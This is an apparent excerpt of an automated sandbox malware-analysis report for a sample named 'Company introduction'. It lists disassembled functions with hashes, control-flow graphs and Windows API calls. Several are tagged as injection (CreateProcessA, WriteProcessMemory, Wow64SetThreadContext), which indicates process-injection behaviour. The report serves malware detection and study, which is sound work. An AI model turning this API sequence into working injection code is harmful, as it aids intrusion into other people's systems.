                                                                                                                                                    • Opcode ID: a2fddfc72944203c132fbab37c596b4390c642b18dcb9d2f1afdfac2da0d968e
                                                                                                                                                    • Instruction ID: baaec17d604cb58e9fc1cd69eee14a9397f4107095d629a1fcfb39022de35b31
                                                                                                                                                    • Opcode Fuzzy Hash: a2fddfc72944203c132fbab37c596b4390c642b18dcb9d2f1afdfac2da0d968e
                                                                                                                                                    • Instruction Fuzzy Hash: 7252D074A00229CFCB65DF68C994AD9BBB2FF99300F0085E9D549A7364DB30AE95CF50
                                                                                                                                                    Function 014B7D99 Relevance: 3.1, Strings: 2, Instructions: 579COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Pp^q$d
                                                                                                                                                    • API String ID: 0-2169010058
                                                                                                                                                    • Opcode ID: 53dd89ad3f6f3caae304369bdff97ca0d2fa2f44d0058ff6cc928c099c62552d
                                                                                                                                                    • Instruction ID: 540f10692913aea09d18421d28dc7b4bbe25657aac62dc01a39bffd1dc792be8
                                                                                                                                                    • Opcode Fuzzy Hash: 53dd89ad3f6f3caae304369bdff97ca0d2fa2f44d0058ff6cc928c099c62552d
                                                                                                                                                    • Instruction Fuzzy Hash: 4F62D074A00229CFCB65DF68C984AD9BBB2FF99300F0085E9D549A7364DB70AE95CF50
                                                                                                                                                    Function 07AE407A Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 5{
                                                                                                                                                    • API String ID: 0-2291050889
                                                                                                                                                    • Opcode ID: f119d799eb5b3fefc719cb06b7248bfb5239311b02301375536747053e60774f
                                                                                                                                                    • Instruction ID: 6ab407390130918ca571287db68b675844ecbb338b0b0484b63f3e792befeb5f
                                                                                                                                                    • Opcode Fuzzy Hash: f119d799eb5b3fefc719cb06b7248bfb5239311b02301375536747053e60774f
                                                                                                                                                    • Instruction Fuzzy Hash: 05B16874E01209DFCB04DFE9D5854AEBBB6FF89300F20956AE815AB364DB349902CF65
                                                                                                                                                    Function 07AE4088 Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 5{
                                                                                                                                                    • API String ID: 0-2291050889
                                                                                                                                                    • Opcode ID: 0715ef34f9cd8e714a1101060c5708612865c858b5214f2f0aa53003aad00ec5
                                                                                                                                                    • Instruction ID: 29efeb4a86ad26a0825b61942995cbe912d591bc6ea022e502be64e3b36ddaa5
                                                                                                                                                    • Opcode Fuzzy Hash: 0715ef34f9cd8e714a1101060c5708612865c858b5214f2f0aa53003aad00ec5
                                                                                                                                                    • Instruction Fuzzy Hash: 24A14874E01209DFCB04DFE9D5854AEBBB6FF89300F20946AE416AB364DB349902CF65
                                                                                                                                                    Function 07AE5B22 Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: j4$y
                                                                                                                                                    • API String ID: 0-2391584009
                                                                                                                                                    • Opcode ID: b8ae88092703768aa52995c07a49db7a18dbc48b4f0d1426c86381eabff7868b
                                                                                                                                                    • Instruction ID: d1aba13e59374485c362ba80adac6e56d8ff0c9147def6668192c576e3d13c1d
                                                                                                                                                    • Opcode Fuzzy Hash: b8ae88092703768aa52995c07a49db7a18dbc48b4f0d1426c86381eabff7868b
                                                                                                                                                    • Instruction Fuzzy Hash: E9813BB1D15209DFDB08CFE5E98089EFBB6FF89314F10942AE415AB264E7349956CF00
                                                                                                                                                    Function 07AE5B30 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: j4$y
                                                                                                                                                    • API String ID: 0-2391584009
                                                                                                                                                    • Opcode ID: 7bd65c0f8dd2655b66a24772c2e03d81c73378c5c6e74c4c436e70d43206acb1
                                                                                                                                                    • Instruction ID: 79c7506aee89740802a3192c74a01ee32ae0063b1592af4e8dfe0226b2471cdb
                                                                                                                                                    • Opcode Fuzzy Hash: 7bd65c0f8dd2655b66a24772c2e03d81c73378c5c6e74c4c436e70d43206acb1
                                                                                                                                                    • Instruction Fuzzy Hash: 9D8109B1D15209DFDB08CFE6E98089EFBB6EF89314F10942AE415AB264E7349952CF40
                                                                                                                                                    Function 07E95F00 Relevance: .4, Instructions: 396COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fe697affcc24467f480d98093580383429e0e816650e79c8cd14b21050a68bfb
                                                                                                                                                    • Instruction ID: f30c12e3370127a1611570ce9571ecdd84444794996c22ac04b0590012b57f81
                                                                                                                                                    • Opcode Fuzzy Hash: fe697affcc24467f480d98093580383429e0e816650e79c8cd14b21050a68bfb
                                                                                                                                                    • Instruction Fuzzy Hash: 2DE1C1B2B022058FDB25DB7AC490BAEB7F6AF89704F14447ED1469B3A0DB35E841C761
                                                                                                                                                    Function 07AE44B8 Relevance: .2, Instructions: 177COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1802c0dae7cdbf063d712fbd0a94bcf9c894facb65898964bcccd0423698549c
                                                                                                                                                    • Instruction ID: 5ae871af06787e27230b19ed4f5b7fe7ee5fb8306a025f4a6ec5dfa75e534176
                                                                                                                                                    • Opcode Fuzzy Hash: 1802c0dae7cdbf063d712fbd0a94bcf9c894facb65898964bcccd0423698549c
                                                                                                                                                    • Instruction Fuzzy Hash: 30612BB4E152099FCB04CFA5D9455AEBFB6FF89300F14A42AE526E7364DB748A01CF60
                                                                                                                                                    Function 07AE44C8 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 646611f0673a49027f1f7df47e921dadc38117616b64ce4f9b81f6835caaa859
                                                                                                                                                    • Instruction ID: 7476856c18f0fb6404d0f7817d569ab98ac29bb0bdb538e474dafec1ce0693e1
                                                                                                                                                    • Opcode Fuzzy Hash: 646611f0673a49027f1f7df47e921dadc38117616b64ce4f9b81f6835caaa859
                                                                                                                                                    • Instruction Fuzzy Hash: 99510AB4E152099FCB04CFA5D5454AEFBB6FB89300F10A82AE526E7364DB749901CF54
                                                                                                                                                    Function 07AE05B0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b25a15d9eb5785e2ef33c6bc5fa359ffcc5c49b2e730ed77eb32725e4f34749c
                                                                                                                                                    • Instruction ID: 815b2967e5deef91167fc6a3730151c720c216647005cb0d839f4e252128df60
                                                                                                                                                    • Opcode Fuzzy Hash: b25a15d9eb5785e2ef33c6bc5fa359ffcc5c49b2e730ed77eb32725e4f34749c
                                                                                                                                                    • Instruction Fuzzy Hash: 6231F871E012188BDB58CFA6D84469EBBB7EFC8310F14C0A9E409AA354DB715A85CF40
                                                                                                                                                    Function 07AE05A0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a02d52ef17ee2698b2c0d10f764e0be5cf221516ba1c2fc84f9ce30114160d3d
                                                                                                                                                    • Instruction ID: 0de19d20614578c76218ef495345153b1dfd63f092a2178d8369e0f4233bef1d
                                                                                                                                                    • Opcode Fuzzy Hash: a02d52ef17ee2698b2c0d10f764e0be5cf221516ba1c2fc84f9ce30114160d3d
                                                                                                                                                    • Instruction Fuzzy Hash: F921FCB0E016588BDB58CFABD9446DEBFF3AFC9310F14C1BAD408AA269DA740945CF51
                                                                                                                                                    Function 07E93F5E Relevance: .0, Instructions: 16COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0c8e64f9da0c628b23d58ff387d5779d2478706888f24257d939efcc63f6fe44
                                                                                                                                                    • Instruction ID: 6a59181cc1ffdbcfaef36ef192bfd37cfa46be1d8a476387cc3f489fe993cdb5
                                                                                                                                                    • Opcode Fuzzy Hash: 0c8e64f9da0c628b23d58ff387d5779d2478706888f24257d939efcc63f6fe44
                                                                                                                                                    • Instruction Fuzzy Hash: E9D092F6C1F15ACACF108F189441AF9A2B8A70F301F0039A5D51EA2182D37089A28A09
                                                                                                                                                    Function 014BE800 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 294 14be800-14be88f GetCurrentProcess 298 14be898-14be8cc GetCurrentThread 294->298 299 14be891-14be897 294->299 300 14be8ce-14be8d4 298->300 301 14be8d5-14be909 GetCurrentProcess 298->301 299->298 300->301 303 14be90b-14be911 301->303 304 14be912-14be92a 301->304 303->304 306 14be933-14be962 GetCurrentThreadId 304->306 308 14be96b-14be9cd 306->308 309 14be964-14be96a 306->309 309->308
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 014BE87E
                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 014BE8BB
                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 014BE8F8
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 014BE951
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                    • Opcode ID: 7634de1b17c406578a0905cd836624e11ca055dec04d9f6f4eeeea3a6068a797
                                                                                                                                                    • Instruction ID: 6cf2525f8051144b5c638e283da8afeaefa5fe29e0ae4ad15174ad342ec1fe1b
                                                                                                                                                    • Opcode Fuzzy Hash: 7634de1b17c406578a0905cd836624e11ca055dec04d9f6f4eeeea3a6068a797
                                                                                                                                                    • Instruction Fuzzy Hash: 895135B09006498FDB18DFAAD588BDEBBF1AB88314F208469D419A7360D7349984CF65
                                                                                                                                                    Function 07E90BBA Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1061 7e90bba-7e90c55 1063 7e90c8e-7e90cae 1061->1063 1064 7e90c57-7e90c61 1061->1064 1069 7e90cb0-7e90cba 1063->1069 1070 7e90ce7-7e90d16 1063->1070 1064->1063 1065 7e90c63-7e90c65 1064->1065 1066 7e90c88-7e90c8b 1065->1066 1067 7e90c67-7e90c71 1065->1067 1066->1063 1071 7e90c73 1067->1071 1072 7e90c75-7e90c84 1067->1072 1069->1070 1073 7e90cbc-7e90cbe 1069->1073 1080 7e90d18-7e90d22 1070->1080 1081 7e90d4f-7e90e09 CreateProcessA 1070->1081 1071->1072 1072->1072 1074 7e90c86 1072->1074 1075 7e90ce1-7e90ce4 1073->1075 1076 7e90cc0-7e90cca 1073->1076 1074->1066 1075->1070 1078 7e90ccc 1076->1078 1079 7e90cce-7e90cdd 1076->1079 1078->1079 1079->1079 1082 7e90cdf 1079->1082 1080->1081 1083 7e90d24-7e90d26 1080->1083 1092 7e90e0b-7e90e11 1081->1092 1093 7e90e12-7e90e98 1081->1093 1082->1075 1085 7e90d49-7e90d4c 1083->1085 1086 7e90d28-7e90d32 1083->1086 1085->1081 1087 7e90d34 1086->1087 1088 7e90d36-7e90d45 1086->1088 1087->1088 1088->1088 1090 7e90d47 1088->1090 1090->1085 1092->1093 1103 7e90ea8-7e90eac 1093->1103 1104 7e90e9a-7e90e9e 1093->1104 1106 7e90ebc-7e90ec0 1103->1106 1107 7e90eae-7e90eb2 1103->1107 1104->1103 1105 7e90ea0 1104->1105 1105->1103 1109 7e90ed0-7e90ed4 1106->1109 1110 7e90ec2-7e90ec6 1106->1110 1107->1106 1108 7e90eb4 1107->1108 1108->1106 1112 7e90ee6-7e90eed 1109->1112 1113 7e90ed6-7e90edc 1109->1113 1110->1109 1111 7e90ec8 1110->1111 1111->1109 1114 7e90eef-7e90efe 1112->1114 1115 7e90f04 1112->1115 1113->1112 1114->1115 1117 7e90f05 1115->1117 1117->1117
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07E90DF6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                                    • Opcode ID: 98107dcb801fcc5713ecc978daffc9da5325a90056d9d36426bb8c28860777fd
                                                                                                                                                    • Instruction ID: 5c414bebac39048f9ca6a68e4ab6e8ac71578ae39fc9c782e7460c0dd742811a
                                                                                                                                                    • Opcode Fuzzy Hash: 98107dcb801fcc5713ecc978daffc9da5325a90056d9d36426bb8c28860777fd
                                                                                                                                                    • Instruction Fuzzy Hash: D7915CB2D0121ADFDF20CF69C8417DDBBB2BF48314F5485AAE809A7250DB749985CF92
                                                                                                                                                    Function 07E90BC0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1118 7e90bc0-7e90c55 1120 7e90c8e-7e90cae 1118->1120 1121 7e90c57-7e90c61 1118->1121 1126 7e90cb0-7e90cba 1120->1126 1127 7e90ce7-7e90d16 1120->1127 1121->1120 1122 7e90c63-7e90c65 1121->1122 1123 7e90c88-7e90c8b 1122->1123 1124 7e90c67-7e90c71 1122->1124 1123->1120 1128 7e90c73 1124->1128 1129 7e90c75-7e90c84 1124->1129 1126->1127 1130 7e90cbc-7e90cbe 1126->1130 1137 7e90d18-7e90d22 1127->1137 1138 7e90d4f-7e90e09 CreateProcessA 1127->1138 1128->1129 1129->1129 1131 7e90c86 1129->1131 1132 7e90ce1-7e90ce4 1130->1132 1133 7e90cc0-7e90cca 1130->1133 1131->1123 1132->1127 1135 7e90ccc 1133->1135 1136 7e90cce-7e90cdd 1133->1136 1135->1136 1136->1136 1139 7e90cdf 1136->1139 1137->1138 1140 7e90d24-7e90d26 1137->1140 1149 7e90e0b-7e90e11 1138->1149 1150 7e90e12-7e90e98 1138->1150 1139->1132 1142 7e90d49-7e90d4c 1140->1142 1143 7e90d28-7e90d32 1140->1143 1142->1138 1144 7e90d34 1143->1144 1145 7e90d36-7e90d45 1143->1145 1144->1145 1145->1145 1147 7e90d47 1145->1147 1147->1142 1149->1150 1160 7e90ea8-7e90eac 1150->1160 1161 7e90e9a-7e90e9e 1150->1161 1163 7e90ebc-7e90ec0 1160->1163 1164 7e90eae-7e90eb2 1160->1164 1161->1160 1162 7e90ea0 1161->1162 1162->1160 1166 7e90ed0-7e90ed4 1163->1166 1167 7e90ec2-7e90ec6 1163->1167 1164->1163 1165 7e90eb4 1164->1165 1165->1163 1169 7e90ee6-7e90eed 1166->1169 1170 7e90ed6-7e90edc 1166->1170 1167->1166 1168 7e90ec8 1167->1168 1168->1166 1171 7e90eef-7e90efe 1169->1171 1172 7e90f04 1169->1172 1170->1169 1171->1172 1174 7e90f05 1172->1174 1174->1174
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07E90DF6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                                    • Opcode ID: 4729a35ec6274b5eaf6588b502dfaad1479f88aee70e660e6f44119ef735f1f7
                                                                                                                                                    • Instruction ID: 6b40241be75466165d654522eab4b5285532c923875a5daa00d41ea79b984640
                                                                                                                                                    • Opcode Fuzzy Hash: 4729a35ec6274b5eaf6588b502dfaad1479f88aee70e660e6f44119ef735f1f7
                                                                                                                                                    • Instruction Fuzzy Hash: 07915CB2D0121ADFDF20CF69C8407DDBBB2BF48314F5485A9E809A7250DB749985CF92
                                                                                                                                                    Function 014B5D94 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 014B5E51
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: 47a73b7689cd188e2f5f502c2894301e4e27969db15226faf524462c560920d4
                                                                                                                                                    • Instruction ID: 9e419ed9a3f731c3a55a3c27faeca5a531e9928f8e5b26dfd8cbea45ddb3431f
                                                                                                                                                    • Opcode Fuzzy Hash: 47a73b7689cd188e2f5f502c2894301e4e27969db15226faf524462c560920d4
                                                                                                                                                    • Instruction Fuzzy Hash: E341B2B0C00619CFDB24DFA9C984BDEFBB5BF48314F24816AD408AB265DB756946CF90
                                                                                                                                                    Function 014B4524 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 014B5E51
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1731566834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_14b0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: 2948b670b2d83bc8bd4b13b77cbc039a5e1c93350b10fd75085b8a6c12f66ea9
                                                                                                                                                    • Instruction ID: 89be1394a15c7da91a6523cc4e636fd495fdaa871536ecd787ec28d07f89e07a
                                                                                                                                                    • Opcode Fuzzy Hash: 2948b670b2d83bc8bd4b13b77cbc039a5e1c93350b10fd75085b8a6c12f66ea9
                                                                                                                                                    • Instruction Fuzzy Hash: 0341D2B0C00619CFDB24DFA9C9847DEFBB5BF49304F24806AD408AB265DB756946CF90
                                                                                                                                                    Function 07E90930 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07E909C8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                                    • Opcode ID: f056806b6db1a59b91881a98a9b30fe5dd70e74b1ab87748d81cff28eee3088b
                                                                                                                                                    • Instruction ID: 7b88b1b2cc4e867b769a995aa1b3b0398f21240c85a027cfda9d347f2bc64eb7
                                                                                                                                                    • Opcode Fuzzy Hash: f056806b6db1a59b91881a98a9b30fe5dd70e74b1ab87748d81cff28eee3088b
                                                                                                                                                    • Instruction Fuzzy Hash: A82148B2900359DFDB10CFA9C841BDEBBF5FF48324F50842AE558A7250C7789995CBA4
                                                                                                                                                    Function 07AEFCE8 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AEFD6E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                                    • Opcode ID: 5cf238a32cb4be74f1d03cfcb45109694c08f6a4b652e7204953e4558b22f448
                                                                                                                                                    • Instruction ID: b473aaf32c63627921e30a3a6d0dd2e26d9ed281799e7ab5d3a1bb8e47ec6347
                                                                                                                                                    • Opcode Fuzzy Hash: 5cf238a32cb4be74f1d03cfcb45109694c08f6a4b652e7204953e4558b22f448
                                                                                                                                                    • Instruction Fuzzy Hash: B52139B19002499FDB10DFAAC4857EEBFF4EB88324F10842AD459A7640CB789985CFA5
                                                                                                                                                    Function 07E90938 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07E909C8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                                    • Opcode ID: db59fefc339154c67f386d2014d759d06a68f7907702112518ac595469d7d031
                                                                                                                                                    • Instruction ID: 8c4f0b613d7e078cf702d8e592c2e4c8e56f5758ba761e5e7efec4ff30d3f1f3
                                                                                                                                                    • Opcode Fuzzy Hash: db59fefc339154c67f386d2014d759d06a68f7907702112518ac595469d7d031
                                                                                                                                                    • Instruction Fuzzy Hash: 5D2126B2900359DFDB10DFA9C885BDEBBF5FF88314F10842AE958A7250C7789945CBA4
                                                                                                                                                    Function 07E90A22 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07E90AA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1726664587-0
                                                                                                                                                    • Opcode ID: 43074a7dd36cd91781dfbde1f9f96bbd97630d603e74b0fadb43d1dadb247c57
                                                                                                                                                    • Instruction ID: 1e2bb87c685ce08f9c3852b4d00376d93fae7754d22f3ca3bcd8beb2dafbf12c
                                                                                                                                                    • Opcode Fuzzy Hash: 43074a7dd36cd91781dfbde1f9f96bbd97630d603e74b0fadb43d1dadb247c57
                                                                                                                                                    • Instruction Fuzzy Hash: 50214AB29003599FCB10CFAAD841AEEFBF5FF48320F50842AE958A7250C7759545CBA5
                                                                                                                                                    Function 07AEFCF0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AEFD6E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
